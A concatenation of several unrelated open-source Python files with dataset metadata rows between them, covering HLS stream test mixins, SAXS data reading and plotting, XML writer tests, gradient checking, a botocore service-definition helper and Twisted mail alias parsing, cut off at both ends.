        # Monkey-patch the writer's close() with the delayed variant above.
        self.writer_close = self.reader.writer.close
        self.reader.writer.close = _await_read_then_close

    def run(self):
        while not self.reader.buffer.closed:
            # at least one read was attempted
            self.read_once.set()
            # only read once per step
            self.read_wait.wait()
            self.read_wait.clear()

            try:
                # don't read again during teardown
                # if there is data left, close() was called manually, and it needs to be read
                if self.reader.buffer.closed and self.reader.buffer.length == 0:
                    return
                if self.read_all:
                    self.data += list(iter(partial(self.reader.read, -1), b""))
                    return
                self.data.append(self.reader.read(-1))
            except OSError as err:
                self.error = err
                return
            finally:
                # notify main thread that reading has finished
                self.read_done.set()

    def reset(self):
        # Clear accumulated data and error between test steps.
        self.data[:] = []
        self.error = None
class TestMixinStreamHLS(unittest.TestCase):
    """unittest mixin that mocks HLS playlist/segment HTTP responses and
    drives the stream's writer and reader threads one step at a time.

    Subclasses override ``__stream__``/``__readthread__`` to inject custom
    stream or read-thread implementations, call ``subject()`` to set up the
    mocked responses, and use ``await_write()``/``await_read()`` to step the
    evented writer/reader.
    """
    __stream__ = HLSStream
    __readthread__ = HLSStreamReadThread

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.mocker = requests_mock.Mocker()
        self.mocks = {}   # url -> registered request mock
        self.session = None
        self.stream = None
        self.thread = None

    def setUp(self):
        super().setUp()
        self.mocker.start()

    def tearDown(self):
        super().tearDown()
        # Stop the read thread and all worker threads before unmocking.
        self.close_thread()
        self.mocker.stop()
        self.mocks.clear()
        self.session = None
        self.stream = None
        self.thread = None

    def mock(self, method, url, *args, **kwargs):
        # Register a mocked response and remember its handle for assertions.
        self.mocks[url] = self.mocker.request(method, url, *args, **kwargs)

    def get_mock(self, item):
        return self.mocks[self.url(item)]

    def called(self, item):
        # Whether the mocked endpoint of *item* was requested.
        return self.get_mock(item).called

    def url(self, item):
        # Each test gets its own URL namespace, derived from the test id.
        return item.url(self.id())

    def content(self, segments, prop="content", cond=None):
        # Expected concatenated payload of the (optionally filtered) segments.
        return b"".join([getattr(segment, prop) for segment in segments.values() if cond is None or cond(segment)])

    # close read thread and make sure that all threads have terminated before moving on
    def close_thread(self):
        thread = self.thread
        if isinstance(thread.reader.writer, EventedHLSStreamWriter):
            thread.reader.writer.write_wait.set()
        thread.reader.close()
        thread.read_wait.set()
        thread.reader.writer.join()
        thread.reader.worker.join()
        thread.join()

    # make one write call on the write thread and wait until it has finished
    def await_write(self, write_calls=1, timeout=5):
        writer = self.thread.reader.writer
        for _ in range(write_calls):
            writer.write_wait.set()
            writer.write_done.wait(timeout)
            writer.write_done.clear()
            if writer.write_error:
                raise writer.write_error

    # make one read call on the read thread and wait until it has finished
    def await_read(self, read_all=False, timeout=5):
        thread = self.thread
        thread.read_all = read_all
        thread.read_wait.set()
        thread.read_done.wait(timeout)
        thread.read_done.clear()
        try:
            if thread.error:
                raise thread.error
            return b"".join(thread.data)
        finally:
            thread.reset()

    def get_session(self, options=None, *args, **kwargs):
        return Streamlink(options)

    # set up HLS responses, create the session and read thread and start it
    def subject(self, playlists, options=None, streamoptions=None, threadoptions=None, *args, **kwargs):
        # filter out tags and duplicate segments between playlist responses while keeping index order
        segments_all = [item for playlist in playlists for item in playlist.items if isinstance(item, Segment)]
        segments = OrderedDict([(segment.num, segment) for segment in segments_all])

        # Playlist endpoint cycles through the playlist responses in order.
        self.mock("GET", self.url(playlists[0]), [{"text": pl.build(self.id())} for pl in playlists])
        for segment in segments.values():
            self.mock("GET", self.url(segment), content=segment.content)

        self.session = self.get_session(options, *args, **kwargs)
        self.stream = self.__stream__(self.session, self.url(playlists[0]), **(streamoptions or {}))

        self.thread = self.__readthread__(self.session, self.stream, **(threadoptions or {}))
        self.thread.start()

        return self.thread, segments
| 33.621723 | 118 | 0.606439 |
a206535b45dc6caa78816eab68b6a1b1b1654290 | 9,080 | py | Python | scripts/saxs_open.py | cristina-mt/biosoft_SAXS | 1d4f4dea5dfb5ef57089e5450a2f3504547c0f24 | [
"MIT"
] | null | null | null | scripts/saxs_open.py | cristina-mt/biosoft_SAXS | 1d4f4dea5dfb5ef57089e5450a2f3504547c0f24 | [
"MIT"
] | null | null | null | scripts/saxs_open.py | cristina-mt/biosoft_SAXS | 1d4f4dea5dfb5ef57089e5450a2f3504547c0f24 | [
"MIT"
] | null | null | null | """
Group of functions to read and display raw data generated from SAXS experiments at the ESRF
- poni file: calibration information
- mask file: identifies the detector lines and beam stopper
- edf file: contains the saxs data
Notes:
- Mask is read either from txt file generated with matlab code, or edf file.
- EDF file is read in the simplest form possible. Adapted from the matlab code by the saxs team.
It's possible it doesn't read all the files. If this is true, more options need to be added
Created on Fri Nov 24 2017
Last modification on Mon Jan 8 2018
version: 0.0
@author: Cristina MT
"""
class OpenSAXS():
    """
    Opens the different types of data generated from SAXS experiments:
        - poni file (.poni) : can be read in a text editor
        - mask file (.msk): binary file, in bits
        - edf file (.edf) : header text + data in binary format, bytes
    """

    @staticmethod
    def read_poni(filename):
        """
        Read the poni calibration file [filename] (full path, with extension).

        Output: [cal_info] dictionary containing the calibration information.
        Typical keys: PixelSize1/PixelSize2, Distance, Poni1/Poni2,
        Rot1/Rot2/Rot3 (not used), Wavelength.
        Note: 1 refers to the X axis, 2 to the Y axis; values are kept as
        the raw strings found in the file.
        """
        cal_info = dict()
        try:
            with open(filename, 'r') as f:
                for line in f:
                    stripped = line.strip()
                    # Skip blank lines and comments.
                    if not stripped or stripped.startswith('#'):
                        continue
                    ind_sep = stripped.find(':')  # ':' separates key and value
                    if ind_sep > 0:  # make sure it's a key/value line
                        # strip() instead of fixed offsets: this also parses
                        # "Key:value" (no space) and the last line of a file
                        # without a trailing newline correctly.
                        key_name = stripped[:ind_sep].strip()
                        key_value = stripped[ind_sep + 1:].strip()
                        cal_info[key_name] = key_value
        except FileNotFoundError:
            print('Error File Does Not Exist: ' + filename)
        return cal_info

    @staticmethod
    def read_mask_msk(filename):
        """
        Read the mask file [filename] (.msk, bit-packed; full path).

        Output: [mask] numpy 2D array with 0|1 values.

        Warning: do not use! There is an unresolved issue with reading the
        file as bits -- the offsets below are arbitrary (trial/error) and
        still to be checked.
        note: adapted from B.Vos CreateMask matlab code
        (matlab does have a builtin function to read bits)
        """
        import numpy as np
        mask_bytes = np.fromfile(filename, 'uint8')  # smallest unit numpy reads is bytes
        mask_bits = np.unpackbits(mask_bytes)        # convert bytes to bits
        # Arbitrary offsets, obtained by trial/error to match SAXS data array shape
        xo = 11
        yo = 8
        offset = (1043 + yo) * (981 + xo)
        # Reshape the string of bits into a 2D array
        mask = mask_bits[245:245 + offset].reshape([1043 + yo, 981 + xo])[yo:, xo:]
        return mask

    @staticmethod
    def read_mask_txt(filename):
        """
        Read the mask file [filename] (.txt, comma separated; full path).

        Output: [mask] numpy 2D array with 0|1 values.
        """
        import numpy as np
        # The txt mask is saved with the x/y axes inverted, hence the transpose.
        mask_raw = np.loadtxt(filename, delimiter=',')
        return mask_raw.transpose()

    @staticmethod
    def read_mask_edf(filename):
        """
        Read the mask file [filename] (.edf; full path).

        Output: [mask] numpy 2D array with 0|1 values.
        """
        import numpy as np
        mask_bytes = np.fromfile(filename, 'uint8')  # mask is saved as unsigned bytes
        # Arbitrary offset, obtained by trial/error to match SAXS data array shape.
        offset = 1024
        # Reshape the string of bytes into a 2D array.
        return mask_bytes[offset:].reshape(1043, 981)

    @staticmethod
    def read_edf(filename):
        """
        Read the edf data file [filename] (full path, with extension).

        Output:
            [image] numpy 2D array containing the SAXS data
            [header_info] dictionary with all the information in the header
        """
        import numpy as np
        import codecs
        header_info = dict()
        image = []
        try:
            # Read the file line by line to extract the header key/value pairs.
            with codecs.open(filename, "r", encoding='utf-8', errors='replace') as f:
                f.readline()
                read_line = 1  # flag used to stop reading once the header ends
                while read_line == 1:
                    line = f.readline()
                    ind_sep = line.find('=')  # '=' separates key and value
                    if ind_sep > 0:  # a header variable, not blank/binary data
                        key_name = line[0:ind_sep - 1]
                        key_value = line[ind_sep + 2:-3]
                        header_info[key_name] = key_value
                    else:
                        read_line = 0  # no '=' found: the header is over

            if header_info.get('DataType') == 'SignedInteger':
                # Condition extracted from the matlab code; other data types
                # exist but are not handled here.
                dt = 'int32'
                # Read as [dt], stopping at the [Size] reported in the header.
                data = np.fromfile(filename, dtype=dt, count=int(header_info['Size']))
                xdim = int(header_info.get('Dim_1'))
                ydim = int(header_info.get('Dim_2'))
                # Reshape into 2D; the 512-element offset is arbitrary
                # (obtained by trial/error).
                image = data[512:].reshape(ydim, xdim)
            else:
                print('[' + header_info.get('DataType') + '] data type not known')
        except FileNotFoundError:
            print('Error File Does Not Exist: ' + filename)
        return image, header_info
class ShowSAXS():
    """
    Displays the different types of raw data read with OpenSAXS class:
        - mask: binary array
        - image: SAXS data array
    Note: Each time a function is called, it creates a new figure
    """

    @staticmethod
    def raw_img(saxs_image, vmin=None, vmax=None,
                show_center=None, log_scale=None, colormap=None):
        """
        Show the raw SAXS data contained in the [saxs_image] 2D numpy array.

        [vmin]/[vmax] colorscale limits; defaults are the data min/max.
        [show_center] is an [x, y] pair; if None, the beam center is not drawn.
        [log_scale] by default np.log is applied to the data; pass False to
            display the raw values instead.
        [colormap] any matplotlib colormap name; default is 'inferno'.
        """
        import numpy as np
        import matplotlib.pyplot as plt

        plt.figure()
        # Configure display according to options.
        # NOTE(fix): previously, any log_scale value other than None/False
        # (e.g. True) left `image` unassigned and raised NameError; now
        # everything except an explicit False selects the log display.
        if log_scale is False:
            image = 1. * saxs_image
        else:
            image = np.log(saxs_image)
        cmap_choice = 'inferno' if colormap is None else colormap
        v1 = np.min(image.flatten()) if vmin is None else vmin
        v2 = np.max(image.flatten()) if vmax is None else vmax
        # Plot image and center, if applicable.
        plt.imshow(image,
                   cmap=cmap_choice,
                   interpolation='none',
                   vmin=v1, vmax=v2)
        if show_center is not None:
            plt.plot([0, image.shape[1]], [show_center[1], show_center[1]], '--', c='cyan')
            plt.plot([show_center[0], show_center[0]], [0, image.shape[0]], '--', c='cyan')
            # Restore the axis limits, since the center lines extend them.
            plt.xlim([0, image.shape[1]])
            plt.ylim([image.shape[0], 0])
        # plt.show() is intentionally left to the caller.

    @staticmethod
    def mask(mask_array, show_center=None):
        """
        Show the [mask_array] 2D numpy array used to discard the detector
        lines and beam stopper.

        [show_center] is an [x, y] pair; if None, the beam center is not drawn.
        """
        import matplotlib.pyplot as plt

        # Plot image and center, if applicable.
        plt.figure()
        plt.imshow(mask_array,
                   cmap='gray',
                   interpolation='none')
        if show_center is not None:
            plt.plot([0, mask_array.shape[1]], [show_center[1], show_center[1]], '--', c='cyan')
            plt.plot([show_center[0], show_center[0]], [0, mask_array.shape[0]], '--', c='cyan')
            plt.xlim([0, mask_array.shape[1]])
            plt.ylim([mask_array.shape[0], 0])

    @staticmethod
    def img_wmask(saxs_image, mask, vmin=None, vmax=None,
                  show_center=None, log_scale=None, colormap=None, alpha=None):
        """
        Combine ShowSAXS.raw_img() and ShowSAXS.mask(): overlay the mask on
        the image, using [alpha] as transparency value (0-1.0, default 0.5).

        Warning: display might be too slow and could block python, depending
        on how it is running. Function to use carefully.
        """
        import matplotlib.pyplot as plt

        ShowSAXS.raw_img(saxs_image, vmin, vmax, show_center, log_scale, colormap)
        a_value = 0.5 if alpha is None else alpha
        # Map the zero-valued mask cells to NaN so only the masked regions
        # are drawn by the overlay.
        mask_new = 1. * mask
        mask_new[mask == 0] = float('nan')
        plt.imshow(mask_new,
                   interpolation='none',
                   alpha=a_value,
                   vmin=0, vmax=1,
                   cmap='Reds')
| 33.382353 | 139 | 0.690419 |
74839ed5664567bbda6e44f085c0f79bc643e6ea | 699 | py | Python | tensorflow_datasets/question_answering/coqa/__init__.py | shubhamkumaR630/datasets | fe9ee91849cefed0953141ea3588f73b7def78fd | [
"Apache-2.0"
] | 2 | 2022-02-14T09:51:39.000Z | 2022-02-14T13:27:49.000Z | tensorflow_datasets/question_answering/coqa/__init__.py | shubhamkumaR630/datasets | fe9ee91849cefed0953141ea3588f73b7def78fd | [
"Apache-2.0"
] | null | null | null | tensorflow_datasets/question_answering/coqa/__init__.py | shubhamkumaR630/datasets | fe9ee91849cefed0953141ea3588f73b7def78fd | [
"Apache-2.0"
] | 1 | 2020-12-13T22:11:33.000Z | 2020-12-13T22:11:33.000Z | # coding=utf-8
# Copyright 2022 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""coqa dataset."""
from tensorflow_datasets.question_answering.coqa.coqa import Coqa
| 36.789474 | 74 | 0.76824 |
fd0ba89a2c0e0fa8bbb68a04f8ee3631e85ffd36 | 4,263 | py | Python | Tests/misc/xmlWriter_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-05-07T16:29:02.000Z | 2020-05-07T16:29:02.000Z | Tests/misc/xmlWriter_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 74 | 2020-01-30T07:27:54.000Z | 2021-08-03T05:47:17.000Z | Tests/misc/xmlWriter_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-01-22T20:06:09.000Z | 2020-01-22T20:06:09.000Z | from fontTools.misc.py23 import *
import os
import unittest
from fontTools.misc.xmlWriter import XMLWriter
# Expected XML prolog emitted by XMLWriter; lines are terminated with the
# platform's native line separator by default.
linesep = tobytes(os.linesep)
HEADER = b'<?xml version="1.0" encoding="UTF-8"?>' + linesep
class TestXMLWriter(unittest.TestCase):
    """Golden-output tests for fontTools' XMLWriter.

    Each test writes through an XMLWriter backed by an in-memory BytesIO
    buffer and compares the raw bytes (including the XML prolog in HEADER
    and the platform line separator) against an expected literal.
    """

    def test_comment_escaped(self):
        # '&', '<' and '>' must be XML-escaped inside comments.
        writer = XMLWriter(BytesIO())
        writer.comment("This&that are <comments>")
        self.assertEqual(HEADER + b"<!-- This&that are <comments> -->", writer.file.getvalue())

    def test_comment_multiline(self):
        # Each additional comment line is emitted on its own output line.
        writer = XMLWriter(BytesIO())
        writer.comment("Hello world\nHow are you?")
        self.assertEqual(HEADER + b"<!-- Hello world" + linesep + b" How are you? -->",
                         writer.file.getvalue())

    def test_encoding_default(self):
        writer = XMLWriter(BytesIO())
        self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep,
                         writer.file.getvalue())

    def test_encoding_utf8(self):
        # https://github.com/fonttools/fonttools/issues/246
        writer = XMLWriter(BytesIO(), encoding="utf8")
        self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep,
                         writer.file.getvalue())

    def test_encoding_UTF_8(self):
        # https://github.com/fonttools/fonttools/issues/246
        writer = XMLWriter(BytesIO(), encoding="UTF-8")
        self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep,
                         writer.file.getvalue())

    def test_encoding_UTF8(self):
        # https://github.com/fonttools/fonttools/issues/246
        writer = XMLWriter(BytesIO(), encoding="UTF8")
        self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep,
                         writer.file.getvalue())

    def test_encoding_other(self):
        # Only UTF-8 spellings are accepted as encodings.
        self.assertRaises(Exception, XMLWriter, BytesIO(),
                          encoding="iso-8859-1")

    def test_write(self):
        writer = XMLWriter(BytesIO())
        writer.write("foo&bar")
        self.assertEqual(HEADER + b"foo&bar", writer.file.getvalue())

    def test_indent_dedent(self):
        writer = XMLWriter(BytesIO())
        writer.write("foo")
        writer.newline()
        writer.indent()
        writer.write("bar")
        writer.newline()
        writer.dedent()
        writer.write("baz")
        self.assertEqual(HEADER + bytesjoin(["foo", " bar", "baz"], linesep),
                         writer.file.getvalue())

    def test_writecdata(self):
        # CDATA contents are written verbatim, without escaping.
        writer = XMLWriter(BytesIO())
        writer.writecdata("foo&bar")
        self.assertEqual(HEADER + b"<![CDATA[foo&bar]]>", writer.file.getvalue())

    def test_simpletag(self):
        writer = XMLWriter(BytesIO())
        writer.simpletag("tag", a="1", b="2")
        self.assertEqual(HEADER + b'<tag a="1" b="2"/>', writer.file.getvalue())

    def test_begintag_endtag(self):
        writer = XMLWriter(BytesIO())
        writer.begintag("tag", attr="value")
        writer.write("content")
        writer.endtag("tag")
        self.assertEqual(HEADER + b'<tag attr="value">content</tag>', writer.file.getvalue())

    def test_dumphex(self):
        # Hex dump: space-separated groups of 8 hex digits, 16 bytes per line.
        writer = XMLWriter(BytesIO())
        writer.dumphex("Type is a beautiful group of letters, not a group of beautiful letters.")
        self.assertEqual(HEADER + bytesjoin([
            "54797065 20697320 61206265 61757469",
            "66756c20 67726f75 70206f66 206c6574",
            "74657273 2c206e6f 74206120 67726f75",
            "70206f66 20626561 75746966 756c206c",
            "65747465 72732e ", ""], joiner=linesep), writer.file.getvalue())

    def test_stringifyattrs(self):
        # All scalar attribute value types stringify to the same output.
        writer = XMLWriter(BytesIO())
        expected = ' attr="0"'
        self.assertEqual(expected, writer.stringifyattrs(attr=0))
        self.assertEqual(expected, writer.stringifyattrs(attr=b'0'))
        self.assertEqual(expected, writer.stringifyattrs(attr='0'))
        self.assertEqual(expected, writer.stringifyattrs(attr=u'0'))

    def test_carriage_return_escaped(self):
        writer = XMLWriter(BytesIO())
        writer.write("two lines\r\nseparated by Windows line endings")
        self.assertEqual(
            HEADER + b'two lines \nseparated by Windows line endings',
            writer.file.getvalue())

    def test_newlinestr(self):
        # The newlinestr argument overrides the platform default separator.
        header = b'<?xml version="1.0" encoding="UTF-8"?>'
        for nls in (None, '\n', '\r\n', '\r', ''):
            writer = XMLWriter(BytesIO(), newlinestr=nls)
            writer.write("hello")
            writer.newline()
            writer.write("world")
            writer.newline()

            linesep = tobytes(os.linesep) if nls is None else tobytes(nls)

            self.assertEqual(
                header + linesep + b"hello" + linesep + b"world" + linesep,
                writer.file.getvalue())
if __name__ == '__main__':
    import sys
    # Propagate the unittest result as the process exit status.
    sys.exit(unittest.main())
| 33.304688 | 99 | 0.696223 |
b89bcabfdc13ad72fede6d69e6c776c12e99dcf8 | 2,526 | py | Python | cs224n/assignment1/q2_gradcheck.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | cs224n/assignment1/q2_gradcheck.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | cs224n/assignment1/q2_gradcheck.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import numpy as np
import random
# First implement a gradient checker by filling in the following functions
def gradcheck_naive(f, x):
    """Gradient check for a function f.

    Compares the analytic gradient returned by ``f`` against a centered
    finite-difference estimate at every coordinate of ``x`` and prints the
    result.

    Arguments:
    f -- a function that takes a single argument and outputs the
         cost and its gradients
    x -- the point (numpy array) to check the gradient at
    """
    rndstate = random.getstate()
    random.setstate(rndstate)
    fx, grad = f(x)  # Evaluate function value at original point
    h = 1e-4         # Do not change this!

    # Convert to float ONCE, instead of re-copying with astype() on every
    # coordinate inside the loop; on integer inputs the +/- h perturbation
    # would otherwise truncate to zero.
    x = np.asarray(x).astype(float)

    # Iterate over all indexes in x
    it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])
    while not it.finished:
        ix = it.multi_index

        # Centered difference (f(x+h) - f(x-h)) / 2h.  The RNG state is
        # restored before each evaluation so cost functions with built-in
        # randomness see identical draws on every call.
        x[ix] += h
        random.setstate(rndstate)
        fx1, _ = f(x)
        x[ix] -= 2 * h
        random.setstate(rndstate)
        fx2, _ = f(x)
        x[ix] += h  # restore the original coordinate value
        numgrad = (fx1 - fx2) / (2 * h)

        # Compare gradients
        reldiff = abs(numgrad - grad[ix]) / max(1, abs(numgrad), abs(grad[ix]))
        if reldiff > 1e-5:
            # print() calls (not Python-2 print statements) keep this file
            # runnable under both Python 2 and 3.
            print("Gradient check failed.")
            print("First gradient error found at index %s" % str(ix))
            print("Your gradient: %f \t Numerical gradient: %f" % (
                grad[ix], numgrad))
            return

        it.iternext()  # Step to next dimension

    print("Gradient check passed!")
def sanity_check():
    """
    Some basic sanity checks.

    Runs the naive gradient checker on a simple quadratic for scalar,
    1-D and 2-D inputs.
    """
    quad = lambda x: (np.sum(x ** 2), x * 2)

    # print() calls instead of Python-2 print statements so the module
    # remains importable under Python 3.
    print("Running sanity checks...")
    gradcheck_naive(quad, np.array(123.456))       # scalar test
    gradcheck_naive(quad, np.random.randn(3,))     # 1-D test
    gradcheck_naive(quad, np.random.randn(4, 5))   # 2-D test
    print("")
def your_sanity_checks():
    """
    Use this space to add any additional sanity checks by running:
        python q2_gradcheck.py
    This function will not be called by the autograder, nor will
    your additional tests be graded.
    """
    # print() call keeps the module Python-3 compatible.
    print("Running your sanity checks...")
    ### YOUR CODE HERE
    # raise NotImplementedError
    ### END YOUR CODE
if __name__ == "__main__":
    # Run the provided checks first, then any user-added ones.
    sanity_check()
    your_sanity_checks()
| 28.382022 | 79 | 0.605305 |
3e824d1cdcc28656b403fbacbfa69acc3f0f6088 | 105 | py | Python | pyecore/__init__.py | afonsobspinto/pyecore | a741243c68d1b6d3ed383165493531827d9c4c02 | [
"BSD-3-Clause"
] | null | null | null | pyecore/__init__.py | afonsobspinto/pyecore | a741243c68d1b6d3ed383165493531827d9c4c02 | [
"BSD-3-Clause"
] | null | null | null | pyecore/__init__.py | afonsobspinto/pyecore | a741243c68d1b6d3ed383165493531827d9c4c02 | [
"BSD-3-Clause"
] | null | null | null | """
"""
from .utils import install_issubclass_patch

# Package version string; keep in sync with the distribution metadata.
__version__ = "0.8.6"

# Applied once at package import time; patches issubclass behaviour
# (implementation lives in .utils).
install_issubclass_patch()
| 10.5 | 43 | 0.733333 |
472f1f253f59e246ccf368725276c3e53bb61fc4 | 1,415 | py | Python | trailscraper/boto_service_definitions.py | flosell/trailscraper | 511a073ae75bba1cc4dd7b6bea1d51a70d95ad48 | [
"Apache-2.0"
] | 497 | 2018-01-08T15:36:05.000Z | 2022-03-30T14:11:54.000Z | trailscraper/boto_service_definitions.py | flosell/trailscraper | 511a073ae75bba1cc4dd7b6bea1d51a70d95ad48 | [
"Apache-2.0"
] | 97 | 2017-11-26T13:52:20.000Z | 2022-02-07T01:36:10.000Z | trailscraper/boto_service_definitions.py | flosell/trailscraper | 511a073ae75bba1cc4dd7b6bea1d51a70d95ad48 | [
"Apache-2.0"
] | 26 | 2019-04-04T21:37:29.000Z | 2022-02-18T10:23:07.000Z | """Helper Methods to get service definition information out of the boto library"""
import fnmatch
import json
import os
from pkg_resources import resource_filename, Requirement
def boto_service_definition_files():
    """Return paths to all service definition files from botocore"""
    data_root = resource_filename(Requirement.parse("botocore"),
                                  "botocore/data")
    matches = []
    for directory, _, filenames in os.walk(data_root):
        for name in filenames:
            if fnmatch.fnmatch(name, 'service-*.json'):
                matches.append(os.path.join(directory, name))
    return matches
def service_definition_file(servicename):
    """Return the path to the most recent service definition file for a
    service.

    The original implementation called boto_service_definition_files() once
    and discarded the result before calling it again inside the filter,
    walking the botocore data directory twice; the dead call is removed.
    """
    service_definitions_for_service = fnmatch.filter(
        boto_service_definition_files(),
        "**/" + servicename + "/*/service-*.json")
    # Paths embed the API version date, so lexicographic order is
    # chronological and the last entry is the newest definition.
    service_definitions_for_service.sort()
    return service_definitions_for_service[-1]
def operation_definition(servicename, operationname):
    """Returns the operation definition for a specific service and operation"""
    definition_path = service_definition_file(servicename)
    with open(definition_path, encoding="UTF-8") as definition_file:
        service_definition = json.load(definition_file)
    return service_definition['operations'][operationname]
| 38.243243 | 95 | 0.722968 |
cf6d727a692de15f339561a2cfe745e1d84ac42a | 25,305 | py | Python | IMU/VTK-6.2.0/ThirdParty/Twisted/twisted/mail/alias.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | 4 | 2016-03-30T14:31:52.000Z | 2019-02-02T05:01:32.000Z | IMU/VTK-6.2.0/ThirdParty/Twisted/twisted/mail/alias.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | 1 | 2020-03-06T04:49:42.000Z | 2020-03-06T04:49:42.000Z | IMU/VTK-6.2.0/ThirdParty/Twisted/twisted/mail/alias.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | 2 | 2019-08-30T23:36:13.000Z | 2019-11-08T16:52:01.000Z | # -*- test-case-name: twisted.mail.test.test_mail -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Support for aliases(5) configuration files.
@author: Jp Calderone
"""
import os
import tempfile
from twisted.mail import smtp
from twisted.internet import reactor
from twisted.internet import protocol
from twisted.internet import defer
from twisted.python import failure
from twisted.python import log
from zope.interface import implements, Interface
def handle(result, line, filename, lineNo):
    """
    Parse one C{user: alias1, alias2, ...} line from an aliases file.

    On success, the stripped alias targets are appended to the list stored
    under the username in C{result} (created on demand).  A line that does
    not contain exactly one C{user: aliases} pair is logged and ignored.

    @type result: L{dict} mapping L{bytes} to L{list} of L{bytes}
    @param result: A dictionary mapping username to aliases, updated in
        place.

    @type line: L{bytes}
    @param line: A line from an aliases file.

    @type filename: L{bytes}
    @param filename: The path to the aliases file, used in error messages.

    @type lineNo: L{int}
    @param lineNo: The position of the line within the file, used in error
        messages.
    """
    pieces = [piece.strip() for piece in line.split(':', 1)]
    if len(pieces) == 2:
        user, alias = pieces
        targets = [target.strip() for target in alias.split(',')]
        result.setdefault(user.strip(), []).extend(targets)
    else:
        log.err("Invalid format on line %d of alias file %s."
                % (lineNo, filename))
def loadAliasFile(domains, filename=None, fp=None):
    """
    Load a file containing email aliases.

    Lines in the file should be formatted like so::

        username: alias1, alias2, ..., aliasN

    Aliases beginning with a C{|} will be treated as programs, will be run, and
    the message will be written to their stdin.

    Aliases beginning with a C{:} will be treated as a file containing
    additional aliases for the username.

    Aliases beginning with a C{/} will be treated as the full pathname to a file
    to which the message will be appended.

    Aliases without a host part will be assumed to be addresses on localhost.

    If a username is specified multiple times, the aliases for each are joined
    together as if they had all been on one line.

    Lines beginning with a space or a tab are continuations of the previous
    line.

    Lines beginning with a C{#} are comments.

    @type domains: L{dict} mapping L{bytes} to L{IDomain} provider
    @param domains: A mapping of domain name to domain object.

    @type filename: L{bytes} or L{NoneType <types.NoneType>}
    @param filename: The full or relative path to a file from which to load
        aliases. If omitted, the C{fp} parameter must be specified.

    @type fp: file-like object or L{NoneType <types.NoneType>}
    @param fp: The file from which to load aliases. If specified,
        the C{filename} parameter is ignored.

    @rtype: L{dict} mapping L{bytes} to L{AliasGroup}
    @return: A mapping from username to group of aliases.
    """
    result = {}
    if fp is None:
        # open() rather than the Python-2-only file() builtin; identical
        # behaviour on Python 2 and keeps the module importable on Python 3.
        fp = open(filename)
    else:
        filename = getattr(fp, 'name', '<unknown>')
    i = 0
    prev = ''
    for line in fp:
        i += 1
        line = line.rstrip()
        if line.lstrip().startswith('#'):
            continue
        elif line.startswith(' ') or line.startswith('\t'):
            # Continuation: accumulate onto the previous logical line.
            prev = prev + line
        else:
            if prev:
                handle(result, prev, filename, i)
            prev = line
    if prev:
        # Flush the final accumulated logical line.
        handle(result, prev, filename, i)
    for (u, a) in result.items():
        # Parsing the username validates it as an address; the parsed value
        # itself is unused.
        addr = smtp.Address(u)
        result[u] = AliasGroup(a, domains, u)
    return result
class IAlias(Interface):
    """
    An interface for aliases.

    An alias knows how to build a message receiver that performs the
    actual delivery (to an address, a file, or a process).
    """

    def createMessageReceiver():
        """
        Create a message receiver.

        @rtype: L{IMessage <smtp.IMessage>} provider
        @return: A message receiver.
        """
class AliasBase:
    """
    The default base class for aliases.

    @ivar domains: See L{__init__}.

    @type original: L{Address}
    @ivar original: The original address being aliased.
    """
    def __init__(self, domains, original):
        """
        @type domains: L{dict} mapping L{bytes} to L{IDomain} provider
        @param domains: A mapping of domain name to domain object.

        @type original: L{bytes}
        @param original: The original address being aliased.
        """
        self.domains = domains
        self.original = smtp.Address(original)

    def domain(self):
        """
        Return the domain associated with original address.

        @rtype: L{IDomain} provider
        @return: The domain for the original address.
        """
        return self.domains[self.original.domain]

    def resolve(self, aliasmap, memo=None):
        """
        Map this alias to its ultimate destination.

        @type aliasmap: L{dict} mapping L{bytes} to L{AliasBase}
        @param aliasmap: A mapping of username to alias or group of aliases.

        @type memo: L{NoneType <types.NoneType>} or L{dict} of L{AliasBase}
        @param memo: A record of the aliases already considered in the
            resolution process.  If provided, C{memo} is modified to include
            this alias.

        @rtype: L{IMessage <smtp.IMessage>} or L{NoneType <types.NoneType>}
        @return: A message receiver for the ultimate destination or None for
            an invalid destination.
        """
        if memo is None:
            memo = {}
        if str(self) in memo:
            # Already visited during this resolution pass; stop here so
            # mutually-referring aliases cannot recurse forever.
            return None
        memo[str(self)] = None
        return self.createMessageReceiver()
class AddressAlias(AliasBase):
    """
    An alias which translates one email address into another.

    @type alias : L{Address}
    @ivar alias: The destination address.
    """
    implements(IAlias)

    def __init__(self, alias, *args):
        """
        @type alias: L{Address}, L{User}, L{bytes} or object which can be
            converted into L{bytes}
        @param alias: The destination address.

        @type args: 2-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain}
